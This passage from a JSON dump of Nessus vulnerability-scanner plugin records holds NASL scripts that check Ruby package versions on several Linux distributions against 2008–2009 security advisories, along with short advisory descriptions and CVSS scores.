reference:\"ruby-1.8.1-7.el4_7.1\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"ruby-devel-1.8.1-7.el4_7.1\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"ruby-docs-1.8.1-7.el4_7.1\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"ruby-libs-1.8.1-7.el4_7.1\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"ruby-mode-1.8.1-7.el4_7.1\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"ruby-tcltk-1.8.1-7.el4_7.1\")) flag++;\n\nif (rpm_check(release:\"SL5\", reference:\"ruby-1.8.5-5.el5_2.5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"ruby-devel-1.8.5-5.el5_2.5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"ruby-docs-1.8.5-5.el5_2.5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"ruby-irb-1.8.5-5.el5_2.5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"ruby-libs-1.8.5-5.el5_2.5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"ruby-mode-1.8.5-5.el5_2.5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"ruby-rdoc-1.8.5-5.el5_2.5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"ruby-ri-1.8.5-5.el5_2.5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"ruby-tcltk-1.8.5-5.el5_2.5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-11-01T02:26:39", "bulletinFamily": "scanner", "description": "Update to new upstream release fixing multiple security issues\ndetailed in the upstream advisories:\nhttp://www.ruby-lang.org/en/news/2008/08/08/multiple-\nvulnerabilities-in-ruby/ - CVE-2008-3655 - multiple insufficient safe\nmode restrictions - CVE-2008-3656 - WEBrick DoS vulnerability (CPU\nconsumption) - CVE-2008-3657 - missing ", "modified": "2019-11-02T00:00:00", "id": "FEDORA_2008-8736.NASL", "href": "https://www.tenable.com/plugins/nessus/34379", "published": "2008-10-10T00:00:00", "title": "Fedora 8 : ruby-1.8.6.287-2.fc8 (2008-8736)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2008-8736.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(34379);\n script_version (\"1.19\");\n script_cvs_date(\"Date: 2019/08/02 13:32:28\");\n\n script_cve_id(\"CVE-2008-3443\", \"CVE-2008-3655\", \"CVE-2008-3656\", \"CVE-2008-3657\", \"CVE-2008-3790\", \"CVE-2008-3905\");\n script_bugtraq_id(30644, 30682, 30802);\n script_xref(name:\"FEDORA\", value:\"2008-8736\");\n\n script_name(english:\"Fedora 8 : ruby-1.8.6.287-2.fc8 (2008-8736)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to new upstream release fixing multiple security issues\ndetailed in the upstream advisories:\nhttp://www.ruby-lang.org/en/news/2008/08/08/multiple-\nvulnerabilities-in-ruby/ - CVE-2008-3655 - multiple insufficient safe\nmode restrictions - CVE-2008-3656 - WEBrick DoS vulnerability (CPU\nconsumption) - CVE-2008-3657 - missing 'taintness' checks in dl module\n- CVE-2008-3905 - resolv.rb adds random transactions ids and source\nports to prevent DNS spoofing attacks\nhttp://www.ruby-lang.org/en/news/2008/08/23/dos-vulnerability-in-\nrexml/ - CVE-2008-3790 - DoS in the REXML module One issue not covered\nby any upstream advisory: - CVE-2008-3443 - DoS in the regular\nexpression engine\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.ruby-lang.org/en/news/2008/08/08/multiple-\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.ruby-lang.org/en/news/2008/08/23/dos-vulnerability-in-\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=458948\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=458953\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=458966\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=459266\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=460134\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=461495\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2008-October/015239.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?dfefb88c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected ruby package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 264, 287, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:8\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/10/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/10/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 8.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC8\", reference:\"ruby-1.8.6.287-2.fc8\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-11-01T02:55:03", "bulletinFamily": "scanner", "description": "A denial of service condition was found in Ruby", "modified": "2019-11-02T00:00:00", "id": "MANDRIVA_MDVSA-2008-226.NASL", "href": "https://www.tenable.com/plugins/nessus/38018", "published": "2009-04-23T00:00:00", "title": "Mandriva Linux Security Advisory : ruby (MDVSA-2008:226)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2008:226. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(38018);\n script_version (\"1.16\");\n script_cvs_date(\"Date: 2019/08/02 13:32:50\");\n\n script_cve_id(\"CVE-2008-3443\", \"CVE-2008-3655\", \"CVE-2008-3656\", \"CVE-2008-3657\", \"CVE-2008-3790\", \"CVE-2008-3905\");\n script_xref(name:\"MDVSA\", value:\"2008:226\");\n\n script_name(english:\"Mandriva Linux Security Advisory : ruby (MDVSA-2008:226)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A denial of service condition was found in Ruby's regular expression\nengine. If a Ruby script tried to process a large amount of data via a\nregular expression, it could cause Ruby to enter an infinite loop and\ncrash (CVE-2008-3443).\n\nA number of flaws were found in Ruby that could allow an attacker to\ncreate a carefully crafted script that could allow for the bypass of\ncertain safe-level restrictions (CVE-2008-3655).\n\nA denial of service vulnerability was found in Ruby's HTTP server\ntoolkit, WEBrick. A remote attacker could send a specially crafted\nHTTP request to a WEBrick server that would cause it to use an\nexcessive amount of CPU time (CVE-2008-3656).\n\nAn insufficient taintness check issue was found in Ruby's DL module, a\nmodule that provides direct access to the C language functions. This\nflaw could be used by an attacker to bypass intended safe-level\nrestrictions by calling external C functions with the arguments from\nan untrusted tainted input (CVE-2008-3657).\n\nA denial of service condition in Ruby's XML document parsing module\n(REXML) could cause a Ruby application using the REXML module to use\nan excessive amount of CPU and memory via XML documents with large XML\nentitity definitions recursion (CVE-2008-3790).\n\nThe Ruby DNS resolver library used predictable transaction IDs and a\nfixed source port when sending DNS requests. This could be used by a\nremote attacker to spoof a malicious reply to a DNS query\n(CVE-2008-3905).\n\nThe updated packages have been patched to correct these issues.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_cwe_id(20, 264, 287, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:ruby-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:ruby-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:ruby-tk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2008.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2008.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/11/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2008.0\", reference:\"ruby-1.8.6-5.3mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"ruby-devel-1.8.6-5.3mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"ruby-doc-1.8.6-5.3mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"ruby-tk-1.8.6-5.3mdv2008.0\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2008.1\", reference:\"ruby-1.8.6-9p114.2mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"ruby-devel-1.8.6-9p114.2mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"ruby-doc-1.8.6-9p114.2mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"ruby-tk-1.8.6-9p114.2mdv2008.1\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-11-03T12:38:17", "bulletinFamily": "scanner", "description": "Laurent Gaffie discovered that Ruby did not properly check for memory\nallocation failures. If a user or automated system were tricked into\nrunning a malicious script, an attacker could cause a denial of\nservice. (CVE-2008-3443)\n\nThis update also fixes a regression in the upstream patch previously\napplied to fix CVE-2008-3790. The regression would cause parsing of\nsome XML documents to fail.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "UBUNTU_USN-691-1.NASL", "href": "https://www.tenable.com/plugins/nessus/37474", "published": "2009-04-23T00:00:00", "title": "Ubuntu 8.10 : ruby1.9 vulnerability (USN-691-1)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-691-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(37474);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/08/02 13:33:02\");\n\n script_cve_id(\"CVE-2008-3443\", \"CVE-2008-3790\");\n script_bugtraq_id(30682, 30802);\n script_xref(name:\"USN\", value:\"691-1\");\n\n script_name(english:\"Ubuntu 8.10 : ruby1.9 vulnerability (USN-691-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Laurent Gaffie discovered that Ruby did not properly check for memory\nallocation failures. If a user or automated system were tricked into\nrunning a malicious script, an attacker could cause a denial of\nservice. (CVE-2008-3443)\n\nThis update also fixes a regression in the upstream patch previously\napplied to fix CVE-2008-3790. The regression would cause parsing of\nsome XML documents to fail.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/691-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:irb1.9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libdbm-ruby1.9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libgdbm-ruby1.9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libopenssl-ruby1.9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libreadline-ruby1.9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libruby1.9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libruby1.9-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libtcltk-ruby1.9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:rdoc1.9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:ri1.9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:ruby1.9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:ruby1.9-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:ruby1.9-elisp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:ruby1.9-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/12/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2008-2019 Canonical, Inc. / NASL script (C) 2009-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(8\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 8.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"8.10\", pkgname:\"irb1.9\", pkgver:\"1.9.0.2-7ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libdbm-ruby1.9\", pkgver:\"1.9.0.2-7ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libgdbm-ruby1.9\", pkgver:\"1.9.0.2-7ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libopenssl-ruby1.9\", pkgver:\"1.9.0.2-7ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libreadline-ruby1.9\", pkgver:\"1.9.0.2-7ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libruby1.9\", pkgver:\"1.9.0.2-7ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libruby1.9-dbg\", pkgver:\"1.9.0.2-7ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libtcltk-ruby1.9\", pkgver:\"1.9.0.2-7ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"rdoc1.9\", pkgver:\"1.9.0.2-7ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"ri1.9\", pkgver:\"1.9.0.2-7ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"ruby1.9\", pkgver:\"1.9.0.2-7ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"ruby1.9-dev\", pkgver:\"1.9.0.2-7ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"ruby1.9-elisp\", pkgver:\"1.9.0.2-7ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"ruby1.9-examples\", pkgver:\"1.9.0.2-7ubuntu1.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"irb1.9 / libdbm-ruby1.9 / libgdbm-ruby1.9 / libopenssl-ruby1.9 / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-11-03T12:17:24", "bulletinFamily": "scanner", "description": "This ruby update improves return value checks for openssl function\nOCSP_basic_verify() (CVE-2009-0642) which allowed an attacker to use\nrevoked certificates. The entropy of DNS identifiers was increased\n(CVE-2008-3905) to avaid spoofing attacks. The code for parsing XML\ndata was vulnerable to a denial of service bug (CVE-2008-3790). An\nattack on algorithm complexity was possible in function\nWEBrick::HTTP::DefaultFileHandler() while parsing HTTP requests\n(CVE-2008-3656) as well as by using the regex engine (CVE-2008-3443)\ncausing high CPU load. Ruby", "modified": "2019-11-02T00:00:00", "id": "SUSE_11_0_RUBY-090703.NASL", "href": "https://www.tenable.com/plugins/nessus/40122", "published": "2009-07-21T00:00:00", "title": "openSUSE Security Update : ruby (ruby-1070)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update ruby-1070.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(40122);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2019/10/25 13:36:34\");\n\n script_cve_id(\"CVE-2008-3443\", \"CVE-2008-3655\", \"CVE-2008-3656\", \"CVE-2008-3657\", \"CVE-2008-3790\", \"CVE-2008-3905\", \"CVE-2009-0642\", \"CVE-2009-1904\");\n\n script_name(english:\"openSUSE Security Update : ruby (ruby-1070)\");\n script_summary(english:\"Check for the ruby-1070 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This ruby update improves return value checks for openssl function\nOCSP_basic_verify() (CVE-2009-0642) which allowed an attacker to use\nrevoked certificates. The entropy of DNS identifiers was increased\n(CVE-2008-3905) to avaid spoofing attacks. The code for parsing XML\ndata was vulnerable to a denial of service bug (CVE-2008-3790). An\nattack on algorithm complexity was possible in function\nWEBrick::HTTP::DefaultFileHandler() while parsing HTTP requests\n(CVE-2008-3656) as well as by using the regex engine (CVE-2008-3443)\ncausing high CPU load. Ruby's access restriction code (CVE-2008-3655)\nas well as safe-level handling using function DL.dlopen()\n(CVE-2008-3657) and big decimal handling (CVE-2009-1904) was improved.\nBypassing HTTP basic authentication (authenticate_with_http_digest) is\nnot possible anymore.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=415678\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=420084\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=423234\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=478019\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=499253\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=509914\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=511568\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected ruby packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_cwe_id(20, 189, 264, 287, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby-doc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby-doc-ri\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby-test-suite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby-tk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.0\", reference:\"ruby-1.8.6.p369-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"ruby-devel-1.8.6.p369-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"ruby-doc-html-1.8.6.p369-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"ruby-doc-ri-1.8.6.p369-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"ruby-examples-1.8.6.p369-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"ruby-test-suite-1.8.6.p369-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"ruby-tk-1.8.6.p369-0.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else 